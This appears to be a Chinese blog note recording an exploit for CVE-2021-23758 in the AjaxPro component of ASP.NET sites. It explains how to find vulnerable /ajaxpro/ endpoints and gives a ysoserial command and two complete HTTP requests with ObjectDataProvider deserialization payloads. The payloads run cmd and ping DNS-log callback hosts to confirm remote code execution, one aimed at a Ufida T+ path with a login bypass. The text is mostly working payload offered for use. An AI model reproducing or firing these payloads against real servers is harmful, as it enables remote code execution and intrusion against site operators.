ajaxpro CVE-2021-23758 漏洞记录

发布于:2024-03-28 ⋅ 阅读:(14) ⋅ 点赞:(0)

1. 一般出现在asp.net的站点  

打开页面,源代码会看到 类似/ajaxpro/gust_search,wlms.ashx路径
如果有源代码的话,copy aspx all.txt
去掉分号中间空格批量请求。


2.  ajaxpro组件存在CVE-2021-23758漏洞,标有属性[AjaxPro.AjaxMethod]或[AjaxMethod],并且接收object类型参数的方法能够rce

搜索public  &   object  

obj对应object后的参数
X-Ajaxpro-Method  对应object前的类,如果带method就不需要了

   生成payload替换下面列表

ysoserial.exe -g objectdataprovider -f JavaScriptSerializer -c "ping dnslog" -o raw   
POST /ajaxpro/gust_search,ppms.ashx?method=Ajaxpro HTTP/2
Host: 127.0.0.1
Cookie: ASP.NET_SessionId=pvht0n45im23adqck1mlurap
Content-Length: 584
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
X-Ajaxpro-Method: Ajaxpro
Content-Type: text/plain; charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://localhost:44375
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost:44375/demo
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

{"obj":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
        "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
            "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "FileName":"cmd",
            "Arguments":"/c ping 123.dnslog.cn"
        }
    }
}}


2:

POST /ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore/;/login HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
X-Ajaxpro-Method: GetStoreWarehouseByStore
Host: 192.168.37.168:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-type: application/x-www-form-urlencoded
Content-Length: 604

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
        "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
            "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "FileName":"cmd", "Arguments":"/c ping d4e5b59b8a.ipv6.1433.eu.org."
        }
    }
  }
}

本文含有隐藏内容,请 开通VIP 后查看

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布